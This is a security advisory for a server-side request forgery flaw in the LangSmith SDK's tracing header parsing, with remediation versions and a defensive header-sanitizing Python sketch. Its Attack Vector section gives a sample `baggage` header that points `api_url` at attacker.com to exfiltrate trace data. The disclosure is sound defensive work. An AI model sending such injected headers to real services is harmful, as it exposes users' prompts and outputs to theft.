MEDIUM 5.8

GHSA-v34v-rq6j-cj6p

LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection

Details

## Summary

The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary `api_url` values through the `baggage` header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.

---

## Description

When using distributed tracing, the SDK parses incoming HTTP headers via `RunTree.from_headers()` in Python or `RunTree.fromHeaders()` in TypeScript. The `baggage` header can contain replica configurations including `api_url` and `api_key` fields.

Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's `post()` and `patch()` methods send run data to all configured replica URLs, including any injected by an attacker.

---

## Attack Vector

1. Attacker sends an HTTP request to a vulnerable service with a malicious `baggage` header:

   ```
   baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]
   ```

2. The service parses the header via `RunTree.from_headers()`, storing the attacker's URL

3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to `https://attacker.com/exfil`

---

## Impact

- **Data Exfiltration:** Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
- **SSRF:** Ability to make the server send requests to arbitrary URLs, potentially targeting internal services

---

## Affected Use Cases

Applications are vulnerable if they:

- Use `TracingMiddleware` to automatically propagate tracing context
- Call `RunTree.from_headers()` / `RunTree.fromHeaders()` with untrusted HTTP headers

---

## Remediation

Update to the patched versions:

- **Python:** `pip install 'langsmith>=0.6.3'`
- **JavaScript:** `npm install 'langsmith@>=0.4.6'`

The fix filters incoming replica configurations to an allowlist of safe fields, removing `api_url`, `api_key`, and other credential fields.

---

## Workarounds

If unable to upgrade immediately:

- Strip or validate the `baggage` header before passing to `from_headers()`
- Do not use `TracingMiddleware` with untrusted traffic
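
One way to apply the first workaround, as an added example (not LangSmith's code and not the official patch): drop the `langsmith-replicas` member from the `baggage` header before the headers reach `RunTree.from_headers()`. The function names and the second sample header are constructed for illustration; the sketch assumes baggage members are comma-separated `key=value` pairs and discards the whole header when any member does not parse.

```python
import re
from urllib.parse import unquote

# Baggage member that carries replica configuration (name taken from the advisory).
BLOCKED_KEYS = {"langsmith-replicas"}
# Baggage keys must be HTTP tokens; anything else is treated as malformed.
_TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")


def sanitize_baggage(value):
    """Return the baggage value without replica members, or None to drop the header."""
    kept = []
    for member in value.split(","):
        member = member.strip()
        if not member:
            continue
        key, sep, _ = member.partition("=")
        # Decode and lowercase so an encoded or mixed-case key cannot slip past.
        key = unquote(key.strip()).lower()
        if not sep or not _TOKEN.fullmatch(key):
            # Unencoded JSON splits into fragments without '='; fail closed.
            return None
        if key in BLOCKED_KEYS:
            continue
        kept.append(member)
    return ", ".join(kept) or None


def sanitize_headers(headers):
    """Copy a header mapping, sanitizing or removing any 'baggage' entry."""
    clean = {}
    for name, value in headers.items():
        if name.lower() == "baggage":
            value = sanitize_baggage(value)
            if value is None:
                continue
        clean[name] = value
    return clean


if __name__ == "__main__":
    # Constructed request headers; the baggage value is the one shown in the advisory.
    incoming = {
        "Baggage": 'langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]',
        "X-Request-Id": "abc",
    }
    # The sanitized mapping is what would be handed to RunTree.from_headers().
    print(sanitize_headers(incoming))
```

Dropping the member entirely is stricter than the patched SDK's field allowlist, so services that rely on header-propagated replicas lose that feature until they upgrade.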


Affected packages

PyPI / langsmith
First affected version: 0.4.10 Fixed version: 0.6.3
Fix: pip install --upgrade 'langsmith>=0.6.3'
npm / langsmith
First affected version: 0.3.41 Fixed version: 0.4.6
Fix: npm install langsmith@0.4.6
